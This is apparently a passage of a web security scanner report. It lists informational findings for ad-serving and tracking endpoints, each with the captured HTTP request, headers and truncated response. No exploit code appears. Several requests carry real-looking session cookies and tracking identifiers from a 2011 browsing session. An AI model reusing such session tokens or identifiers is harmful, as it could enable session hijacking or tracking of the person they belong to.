24.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2393594&PluID=0&w=300&h=250&ord=949833763&ucm=true&ncu=$$http://adserver.adtech.de/adlink|577|2951880|0|170|AdId=6233986;BnId=1;itime=949833763;key=key1+key2+key3+key4;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001jAsGaJH702WG00003jBofaIOs07Si00001; B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001juYgaL6v07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 14:07:17 GMT
Connection: close
Content-Length: 2128

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

24.12. http://cdn.apture.com/media/html/aptureLoadIframe.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.apture.com
Path:   /media/html/aptureLoadIframe.html

Request

GET /media/html/aptureLoadIframe.html?v=30596971 HTTP/1.1
Host: cdn.apture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=QuDxqe1K4l

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:08 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n25.panthercdn.com
P3P: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Cache-Control: max-age=604800
Expires: Sat, 14 May 2011 00:19:35 GMT
Age: 221973
Content-Type: text/html
Vary: Accept-Encoding
Px-Uncompress-Origin: 1871
Last-Modified: Sat, 07 May 2011 00:12:44 GMT
Connection: keep-alive
Content-Length: 1871

<!--
This is the page which handles fetch/load of localStorage
-->


<!DOCTYPE html>
<html>
<body>
<script>apture=window.apture=window.apture||{};aptureCache=apture.fileCache={};aptureCache.lo
...[SNIP]...

24.13. http://content.pulse360.com/cgi-bin/context.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /cgi-bin/context.cgi

Request

GET /cgi-bin/context.cgi?id=91041742&ganid=floridatoday&gans=news&ganss=&format=bare&ganst=&title=1&signup=1 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:28 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
set-cookie: vi_1.021=130494962871114765000106049048049; domain=.pulse360.com; path=/; expires=Tue, 08-May-2012 14:00:28 GMT
set-cookie: fc_1.2=AXzzx00; domain=.pulse360.com; path=/; expires=Mon, 16-May-2011 14:00:28 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 3662

document.write('<style type="text/css">.p360_listing { cursor: pointer;}</style><!--Ad Markup by Seevast--><div id="p360_ad_unit"><div id="p360_header"><div class="p360_aligner_left"><span id="p360_
...[SNIP]...

24.14. http://cookie.alvenda.com/v2_1/code/ExtractCookie.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cookie.alvenda.com
Path:   /v2_1/code/ExtractCookie.html

Request

GET /v2_1/code/ExtractCookie.html HTTP/1.1
Host: cookie.alvenda.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: FsxkbpWeK0qBOf2Doc+3kBZJPfb/6XlZ16Ch9bgIahu/WOkXnvXkghPN8Ynv9vNi
x-amz-request-id: 05B9EA00AB19A8BF
Date: Mon, 09 May 2011 14:05:56 GMT
Last-Modified: Mon, 16 Aug 2010 17:24:15 GMT
ETag: "be82aa9e91a51521e3bc2bd4cf668430"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 1130
Server: AmazonS3

<html>
<head>
</head>
<body>

<script type="text/javascript">//<!--

function sendMessage(value) {
try {
parent.postMessage('message_' + value, '*');
} catch (e) {
// In IE6 an
...[SNIP]...

24.15. http://dx.nme.com/ifrm.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dx.nme.com
Path:   /ifrm.html

Request

GET /ifrm.html HTTP/1.1
Host: dx.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmc=112756251; __utmb=112756251.2.10.1304949643; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 28 Sep 2010 13:30:45 GMT
ETag: "b283ae-664-da23cb40"
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:01:02 GMT
Connection: close
Content-Length: 1636

<html>
<head>
<link href="http://akamai-static.nme.com/themes/default/css/nme_radio.css" rel="stylesheet" type="text/css" media="screen, print" />
<script type="text/javascript" src="nmeradionp.js"
...[SNIP]...

24.16. http://media.adfrontiers.com/pq

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.adfrontiers.com
Path:   /pq

Request

GET /pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t HTTP/1.1
Host: media.adfrontiers.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tc=1; af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:349|1148|1484|1|1304949604776|25|2|0:-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private, no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 01 Jan 2000 00:00:00 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:349|1148|1484|1|1304949604776|25|2|0:-"; Version=1; Domain=media.adfrontiers.com; Max-Age=2592000; Path=/
Content-Type: text/html
Content-Length: 771
Date: Mon, 09 May 2011 14:00:09 GMT
Connection: close

<html><head>
<title>Adv.com 2010 - FCap 3/24 728x90</title>
</head><body marginwidth=0 marginheight=0 leftmargin=0 topmargin=0 style="background-color:transparent">
<script type='text/javascript'>
v
...[SNIP]...

24.17. http://mediacdn.disqus.com/1304703476/build/system/def.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1304703476/build/system/def.html

Request

GET /1304703476/build/system/def.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 07 May 2011 00:13:08 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
X-Varnish: 2794959935 2794959391
Cache-Control: max-age=2370989
Expires: Mon, 06 Jun 2011 00:37:47 GMT
Date: Mon, 09 May 2011 14:01:18 GMT
Connection: close
Content-Length: 26548

<!DOCTYPE html>

<html>
<script>
document.domain = 'disqus.com';

var urls = {
sigma: "http://sigma.disqus.com/sigma.html",
xdm: "http://mediacdn.disqus.com/1304703476/html/xdm
...[SNIP]...

24.18. http://mediacdn.disqus.com/1304703476/build/system/reply.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1304703476/build/system/reply.html

Request

GET /1304703476/build/system/reply.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 07 May 2011 00:13:02 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
X-Varnish: 2794963821 2794959540
Cache-Control: max-age=2370964
Expires: Mon, 06 Jun 2011 00:37:30 GMT
Date: Mon, 09 May 2011 14:01:26 GMT
Connection: close
Content-Length: 33911


<!DOCTYPE html>

<html>
<head>
<meta charset="utf-8">
<title></title>


<style type="text/css">
html,body,div,span,applet,object,iframe,h1,h2,h3,h
...[SNIP]...

24.19. http://mediacdn.disqus.com/1304703476/build/system/upload.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1304703476/build/system/upload.html

Request

GET /1304703476/build/system/upload.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 07 May 2011 00:13:03 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
X-Varnish: 2794960096
Cache-Control: max-age=2370975
Expires: Mon, 06 Jun 2011 00:37:40 GMT
Date: Mon, 09 May 2011 14:01:25 GMT
Connection: close
Content-Length: 13708

<html>
<head>
<meta charset="utf-8">
<title></title>


<style type="text/css">
html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,a
...[SNIP]...

24.20. http://ping.chartbeat.net/ping

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.chartbeat.net
Path:   /ping

Request

GET /ping?h=thevine.com.au&p=%2Fmusic%2Fblogs%2Fmusic-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&u=aewfxpn1kz4cfqjz&d=thevine.com.au&g=7930&n=1&c=9&x=0&y=3519&w=968&j=270&R=0&W=0&I=1&b=76071&t=355bo5p4ft4ws74a&_ HTTP/1.1
Host: ping.chartbeat.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Referrer data required.
Server: nginx/0.7.67
Date: Mon, 09 May 2011 14:11:13 GMT
Content-Type: text/html
Connection: close
Content-Length: 146

<HTML><HEAD>
<TITLE>500 Referrer data required.</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

24.21. http://pixel.invitemedia.com/data_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Request

GET /data_sync?partner_id=64 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJ7H7+DGglUCAcAECUP/o="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:00:14 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 13:59:54 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304949614+ \"5\": 1304340362+ \"4\": 1304340367}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:14 GMT; Path=/
Content-Length: 508
Set-Cookie: dps2b=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; Max-Age=14400

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://r.nexac.com/e/getdata.xgi?dt=fi&fn=adrider&pkey=tubw72p3ncbzv&repequal=-&reppipe=%26code%3D","javascript"
...[SNIP]...

24.22. http://uac.advertising.com/wrapper/aceUACping.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uac.advertising.com
Path:   /wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; C2=bN/xN5pqDIxFGxkovMg3sYU8SKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqDoxsGFftrSQIzaQHRGABg2cxFZm5IaMJxOCBsRphd0I9HsfzFz+i4SQBwWkTltCqGXFseSw7RaIXVSPBrLqRONJUEQT2FyFruTQAzZIX0KHBbzqhcl6BE8sXGyFogRwrgYc4zWdBkoqRwM67FcNNGhWkAbwuRXMUumvBEOpR+NLUGsEpGlIq+bQoeZ4jfOsBgwhB3W7/HUJtGTRZpTrxMFqFH09IGrUo8ew5qYITY6wBsMiBqcAnjagKHEv9FoSqGdQ9fZI2FirZDugxkELJI8GlGlE; GUID=MTMwNDk0OTU5NTsxOjE2cjRvcHExdHZsa21sOjM2NQ; F1=Bg28H3kAAAAAYm1CAEAAgEABAAAABAAAAEAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAno2CkdKAgj1G!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Mon, 09 May 2011 14:40:12 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:19 GMT
Connection: close
Content-Length: 2793

<html><head></head><body><script type='text/javascript'>    
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

24.23. http://wd.sharethis.com/api/getCount2.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 246

stButtons.processCB({"url":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20110509%2C0%2C6839926.story","email":9,"total":9,"ourl":"http:\/\/www.orlandosentinel.com\/business\/os-c
...[SNIP]...

24.24. http://widgets.surphace.com/partner/omniture/sphereomni_api.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.surphace.com
Path:   /partner/omniture/sphereomni_api.php

Request

GET /partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinel&evt=fireSphereOmInitAction&omid=501482 HTTP/1.1
Host: widgets.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Machine: web23
Content-Type: text/html
x-forwarded-for: 173.193.214.243
Content-Length: 11019
Date: Mon, 09 May 2011 13:59:58 GMT
X-Varnish: 730030070 730030036
Age: 1
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<title>SphereOm Remote</title>


<script type="text/javascript" >
SPHEREOM = false;

// include Omniture
var sphere_account="aolsphere";


function doLoadTask(){
   //doRegisterSelf();

...[SNIP]...

